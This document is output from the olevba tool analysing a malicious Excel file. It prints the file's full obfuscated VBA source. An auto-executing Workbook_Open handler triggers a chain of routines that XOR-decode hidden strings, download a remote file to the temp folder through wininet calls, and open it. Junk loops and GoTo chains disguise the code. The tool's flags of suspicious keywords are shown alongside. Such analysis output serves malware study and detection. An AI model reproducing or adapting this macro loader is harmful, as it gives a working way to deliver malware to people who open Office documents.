Malicious Excel macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- 3.xls
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 3.xls
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisBook.cls
13. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/ThisBook'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub Workbook_Open()
16. Phamt72loaj
17. End Sub
18.  
19. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
20. ANALYSIS:
21. +----------+---------------+----------------------------------------+
22. | Type     | Keyword       | Description                            |
23. +----------+---------------+----------------------------------------+
24. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
25. +----------+---------------+----------------------------------------+
26. -------------------------------------------------------------------------------
27. VBA MACRO Page1.cls
28. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page1'
29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
30. (empty macro)
31. -------------------------------------------------------------------------------
32. VBA MACRO Page2.cls
33. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page2'
34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
35. (empty macro)
36. -------------------------------------------------------------------------------
37. VBA MACRO Page3.cls
38. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Page3'
39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
40. (empty macro)
41. -------------------------------------------------------------------------------
42. VBA MACRO Heroro6.bas
43. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Heroro6'
44. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
45. Option Explicit
46.  
47. #If VBA7 And Win64 Then
48. Public Declare PtrSafe Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
49. Public Declare PtrSafe Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
50. Public Declare PtrSafe Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As LongPtr, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
51. Public Declare PtrSafe Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
52. #Else
53. Public Declare Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
54. Public Declare Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
55. Public Declare Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As Long, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
56. Public Declare Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
57. #End If
58. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
59. ANALYSIS:
60. +------------+----------------+-----------------------------------------+
61. | Type       | Keyword        | Description                             |
62. +------------+----------------+-----------------------------------------+
63. | Suspicious | Lib            | May run code from a DLL                 |
64. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
65. |            |                | may be used to obfuscate strings        |
66. |            |                | (option --decode to see all)            |
67. | IOC        | wininet.dll    | Executable file name                    |
68. +------------+----------------+-----------------------------------------+
69. -------------------------------------------------------------------------------
70. VBA MACRO File55.bas
71. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File55'
72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
73.  
74. '''+----                                                                   --+
75. '''|                             Ariawase 0.6.0                              |
76. '''|                Ariawase is free library for VBA cowboys.                |
77. '''|          The Project Page: https://github.com/vbaidiot/Ariawase         |
78. '''+--                                                                   ----+
79. Option Explicit
80. Option Private Module
81.  
82.  
83.  
84. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
85. ANALYSIS:
86. +------+----------------------+-------------+
87. | Type | Keyword              | Description |
88. +------+----------------------+-------------+
89. | IOC  | https://github.com/v | URL         |
90. |      | baidiot/Ariawase     |             |
91. +------+----------------------+-------------+
92. -------------------------------------------------------------------------------
93. VBA MACRO File643.bas
94. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/File643'
95. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
96.  
97.  
98.  
99.  
100. Public Enum CdoProtocolsAuthentication
101.     cdoAnonymous = 0
102.     cdoBasic = 1
103.     cdoNTLM = 2
104. End Enum
105.  
106. Public Const cdo7bit        As String = "7bit"
107. Public Const cdo8bit        As String = "8bit"
108. Public Const cdoISO_2022_JP As String = "iso-2022-jp"
109. Public Const cdoShift_JIS   As String = "shift-jis"
110. Public Const cdoEUC_JP      As String = "euc-jp"
111. Public Const cdoUTF_8       As String = "utf-8"
112.  
113. Public Const cdoBase64          As String = "base64"
114. Public Const cdoQuotedPrintable As String = "quoted-printable"
115. Sub Phamt72loaj()
116.  
117. Dim KLAKKKSMMCV As Integer
118. For KLAKKKSMMCV = 0 To 0
119. If KLAKKKSMMCV = 22 Then End
120. Next KLAKKKSMMCV
121. KokoRuko
122.  
123. End Sub
124.  
125.  
126.  
127.  
128.  
129.  
130.  
131. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
132. ANALYSIS:
133. +------------+----------------+-----------------------------------------+
134. | Type       | Keyword        | Description                             |
135. +------------+----------------+-----------------------------------------+
136. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
137. |            |                | may be used to obfuscate strings        |
138. |            |                | (option --decode to see all)            |
139. +------------+----------------+-----------------------------------------+
140. -------------------------------------------------------------------------------
141. VBA MACRO Loop4.bas
142. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Loop4'
143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
144. Option Explicit
145.  
146.  
147. Private Const MBL = 8162
148. Private Const AAN As String = "PRO1"
149. Private Const IOTD = 1
150. Private Const IFNCW = &H4000000
151. Public Function TOPONO6(ByVal LINKO As String, ByVal FILO1 As String) As Boolean
152.     #If VBA7 And Win64 Then
153.         Dim HOHOFO2 As LongPtr, HOHOFI1 As LongPtr
154.     #Else
155.         Dim HOHOFO2 As Long, HOHOFI1 As Long
156.     #End If
157.     Dim HIHORE2 As Long
158.     Dim HAHABU4 As String * MBL, HUHUHISD6 As String
159.     Dim HEHEIFI5 As Integer, KLOPA8 As Double
160.     HOHOFO2 = AJJJAKKL3(AAN, IOTD, vbNullString, vbNullString, 0)
161.     If HOHOFO2 = 0 Then
162.         Exit Function
163.     End If
164.     HOHOFI1 = ALKJPEQQ1(HOHOFO2, LINKO, vbNullString, 0, IFNCW, 0)
165.     If HOHOFI1 = 0 Then
166.         KLOPA8 = 0
167.     Else
168.         BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
169.         HUHUHISD6 = HAHABU4
170.         Do While HIHORE2 <> 0
171.             BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
172.             HUHUHISD6 = HUHUHISD6 + Mid(HAHABU4, 1, HIHORE2)
173.         Loop
174.         KLOPA8 = Len(HUHUHISD6): HEHEIFI5 = FreeFile
175.         Open FILO1 For Binary Access Write Lock Write As #HEHEIFI5
176.         Put #HEHEIFI5, , HUHUHISD6: Close #HEHEIFI5
177.     End If
178.     HUDZOAKJJ HOHOFI1
179.     HUDZOAKJJ HOHOFO2
180.     HUHUHISD6 = ""
181.     If KLOPA8 Then
182.         TOPONO6 = True
183.     End If
184. End Function
185.  
186. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
187. ANALYSIS:
188. +------------+----------------+-----------------------------------------+
189. | Type       | Keyword        | Description                             |
190. +------------+----------------+-----------------------------------------+
191. | Suspicious | Open           | May open a file                         |
192. | Suspicious | Write          | May write to a file (if combined with   |
193. |            |                | Open)                                   |
194. | Suspicious | Put            | May write to a file (if combined with   |
195. |            |                | Open)                                   |
196. | Suspicious | Binary         | May read or write a binary file (if     |
197. |            |                | combined with Open)                     |
198. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
199. |            |                | may be used to obfuscate strings        |
200. |            |                | (option --decode to see all)            |
201. +------------+----------------+-----------------------------------------+
202. -------------------------------------------------------------------------------
203. VBA MACRO Corob5.bas
204. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Corob5'
205. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
206. Private Sub cdsf56GG()
207. GoTo cssghjtky7
208. cssghjtky7:
209. GoTo louioui89
210. louioui89:
211. GoTo mgsmshm
212. mgsmshm:
213. GoTo ntyntyty
214. ntyntyty:
215. GoTo nyttdndny
216. nyttdndny:
217. GoTo brtjtjty
218. brtjtjty:
219.  
220. End Sub
221. Public Function MANAHD3(parampam1 As String, tarampam1 As String) As String
222.     Dim ziZItoTO1 As Long
223.     Dim loLOpoPO1 As String
224.     Dim keKEpePE1 As Integer
225.    
226.     Dim DKKALLLAKK As Integer
227. For DKKALLLAKK = 0 To 0
228. If DKKALLLAKK = 25 Then End
229. Next DKKALLLAKK
230.    
231.     Dim keKEpePE11 As Integer
232.  
233.     For ziZItoTO1 = 1 To (Len(tarampam1) / 2)
234.         keKEpePE1 = val("&H" & (Mid$(tarampam1, (2 * ziZItoTO1) - 1, 2)))
235.         keKEpePE11 = Asc(Mid$(parampam1, ((ziZItoTO1 Mod Len(parampam1)) + 1), 1))
236.         Dim LOAJNNCDHJ As Integer
237.         For LOAJNNCDHJ = 0 To 0
238.         If LOAJNNCDHJ = 14 Then End
239.         Next LOAJNNCDHJ
240.         loLOpoPO1 = loLOpoPO1 + Chr(keKEpePE1 Xor keKEpePE11)
241.          Dim PAPPAPPPAPP As Integer
242.         For PAPPAPPPAPP = 0 To 0
243.         If PAPPAPPPAPP = 4 Then End
244.         Next PAPPAPPPAPP
245.     Next ziZItoTO1
246.    MANAHD3 = loLOpoPO1
247. End Function
248.  
249. Private Sub IHYbeffeVuJC()
250. GoTo asefbttttawf3
251. asefbttttawf3:
252. GoTo sgr4bsgbf67gfh
253. sgr4bsgbf67gfh:
254. GoTo sdvxcxb
255. sdvxcxb:
256. GoTo SSSDFBSS
257. SSSDFBSS:
258. GoTo UTYRURU
259. UTYRURU:
260. GoTo KKTKTJT
261. KKTKTJT:
262. GoTo IhzKeee2ascfacas2zw
263. IhzKeee2ascfacas2zw:
264.  
265. End Sub
266.  
267. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
268. ANALYSIS:
269. +------------+---------+-----------------------------------------+
270. | Type       | Keyword | Description                             |
271. +------------+---------+-----------------------------------------+
272. | Suspicious | Chr     | May attempt to obfuscate specific       |
273. |            |         | strings                                 |
274. | Suspicious | Xor     | May attempt to obfuscate specific       |
275. |            |         | strings                                 |
276. +------------+---------+-----------------------------------------+
277. -------------------------------------------------------------------------------
278. VBA MACRO Class1.cls
279. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
280. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
281. Private xInit As Boolean
282. Private xItems As Variant
283. Private xLength As Long
284.  
285. Public Property Get Item1() As Variant
286.     Dim i As Long: i = 0
287.     If IsObject(xItems(i)) Then Set Item1 = xItems(i) Else Let Item1 = xItems(i)
288. End Property
289.  
290. Public Property Get Item2() As Variant
291.     Dim i As Long: i = 1
292.     If IsObject(xItems(i)) Then Set Item2 = xItems(i) Else Let Item2 = xItems(i)
293. End Property
294.  
295. Public Property Get Item3() As Variant
296.     Dim i As Long: i = 2
297.     If xLength <= i Then Err.Raise 380
298.     If IsObject(xItems(i)) Then Set Item3 = xItems(i) Else Let Item3 = xItems(i)
299. End Property
300.  
301. Public Property Get Item4() As Variant
302.     Dim i As Long: i = 3
303.     If xLength <= i Then Err.Raise 380
304.     If IsObject(xItems(i)) Then Set Item4 = xItems(i) Else Let Item4 = xItems(i)
305. End Property
306.  
307. Public Sub Init(ParamArray itms() As Variant)
308.     If xInit Then Err.Raise 5
309.     xItems = itms
310.     xLength = UBound(itms) + 1
311.    
312.     If xLength < 2 Then Err.Raise 5
313.     xInit = True
314. End Sub
315.  
316. Public Function ToArray() As Variant
317.     ToArray = xItems
318. End Function
319. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
320. ANALYSIS:
321. No suspicious keyword or IOC found.
322. -------------------------------------------------------------------------------
323. VBA MACRO Module1.bas
324. in file: 3.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
325. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
326. Private Const vEVeE3286 = "3F1B161F0042324643595C520D181A1C1D"
327. Private Const rabannsd4 = 30
328. Private Const ceceexcxxXXd = "30270116070D1F525C00041F091416"
329. Private Const rabannsd2 = 31
330. Private Const ceecqq902 = "0407070356435C5B454204085D555D171643060019515C5B1F091416"
331. Private Const rabannsd1 = 33
332. Private Const cemMmm381 = "3F10011A1C181A58541B73580009200A0018091E79515F505218"
333. Private Const rabannsd0 = 34
334.  
335. Private Const ceew343vgVV = "llssslls63551"
336. Sub KokoRuko()
337.  
338.  
339. Dim lodppo21
340. Set lodppo21 = CreateObject _
341. (MANAHD3(ceew343vgVV, cemMmm381))
342. Dim UPANDNNN2
343. Const conspol3 = 2
344. Dim DLAPPAKKVD3 As Integer
345. For DLAPPAKKVD3 = 0 To 0
346. If DLAPPAKKVD3 = 4 Then End
347. Next DLAPPAKKVD3
348. Set UPANDNNN2 = lodppo21.GetSpecialFolder(conspol3)
349. Dim LPPAOOOAOAOMXNXNN As Integer
350. For LPPAOOOAOAOMXNXNN = 0 To 0
351. If LPPAOOOAOAOMXNXNN = 5 Then End
352. Next LPPAOOOAOAOMXNXNN
353. BIGABBDH1 = UPANDNNN2 & MANAHD3(ceew343vgVV, ceceexcxxXXd)
354. Dim PAOOKDKDKDAJWHNN21 As Integer
355. For PAOOKDKDKDAJWHNN21 = 0 To 0
356. If PAOOKDKDKDAJWHNN21 = 5 Then End
357. Next PAOOKDKDKDAJWHNN21
358. Set dwwwdFO2 = CreateObject _
359. (MANAHD3(ceew343vgVV, cemMmm381))
360. Dim ASS555ASS As Integer
361. For ASS555ASS = 0 To 0
362. If ASS555ASS = 5 Then End
363. Next ASS555ASS
364. If dwwwdFO2.FileExists(BIGABBDH1) Then
365. dwwwdFO2.DeleteFile BIGABBDH1
366. End If
367. Dim APOHRKJBMXIKSHJ As Integer
368. For APOHRKJBMXIKSHJ = 0 To 0
369. If APOHRKJBMXIKSHJ = 15 Then End
370. Next APOHRKJBMXIKSHJ
371. If TOPONO6(MANAHD3(ceew343vgVV, ceecqq902), BIGABBDH1) Then
372. End If
373. Set SSSS = Nothing
374. Dim ALOOEPPPEPP2 As Integer
375. For ALOOEPPPEPP2 = 0 To 0
376. If ALOOEPPPEPP2 = 8 Then End
377. Next ALOOEPPPEPP2
378. If dwwwdFO2.FileExists(BIGABBDH1) Then
379. End If
380. Dim PLKJHAGGGTTTS As Integer
381. For PLKJHAGGGTTTS = 0 To 0
382. If PLKJHAGGGTTTS = 3 Then End
383. Next PLKJHAGGGTTTS
384. Set SASASA = CreateObject _
385. (MANAHD3(ceew343vgVV, vEVeE3286))
386. Dim APQIEJAQPLQ As Integer
387. For APQIEJAQPLQ = 0 To 0
388. If APQIEJAQPLQ = 5 Then End
389. Next APQIEJAQPLQ
390. SASASA.Open BIGABBDH1
391.  
392. End Sub
393. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
394. ANALYSIS:
395. +------------+--------------+-----------------------------------------+
396. | Type       | Keyword      | Description                             |
397. +------------+--------------+-----------------------------------------+
398. | Suspicious | CreateObject | May create an OLE object                |
399. | Suspicious | Open         | May open a file                         |
400. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
401. |            |              | be used to obfuscate strings (option    |
402. |            |              | --decode to see all)                    |
403. +------------+--------------+-----------------------------------------+